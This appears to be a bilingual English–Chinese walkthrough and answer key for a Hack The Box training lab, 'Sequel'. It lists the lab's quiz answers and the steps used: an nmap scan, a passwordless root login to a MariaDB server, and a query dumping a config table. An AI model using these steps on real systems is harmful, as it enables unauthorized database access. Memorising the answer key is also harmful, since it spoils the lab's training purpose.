STARTING POINT - TIER 1 - Sequel

一、题目

TASK 1

What does the acronym SQL stand for?
SQL的缩写代表什么？
答案：Structured Query Language

TASK 2

During our scan, which port running mysql do we find?
在我们的扫描中，我们发现哪个端口在运行mysql？
答案：3306

TASK 3

What community-developed MySQL version is the target running?
目标运行的是哪个社区开发的MySQL版本？
答案：MariaDB

TASK 4

What switch do we need to use in order to specify a login username for the MySQL service?
我们需要使用什么开关来为MySQL服务指定一个登录用户名？
答案：-u

TASK 5

Which username allows us to log into MariaDB without providing a password?
哪个用户名允许我们在不提供密码的情况下登录MariaDB？
答案：root

TASK 6

What symbol can we use to specify within the query that we want to display everything inside a table?
我们可以用什么符号在查询中指定我们要显示一个表中的所有内容？
答案：*

TASK 7

What symbol do we need to end each query with?
我们需要用什么符号来结束每个查询？
答案：;

二、过程

使用nmap扫描
nmap 10.129.34.12

发现开放3306端口，尝试使用root连接
mysql -h 10.129.34.12 -u root

连接成功，查询数据库中信息
show databases;
use htb;
select * from config;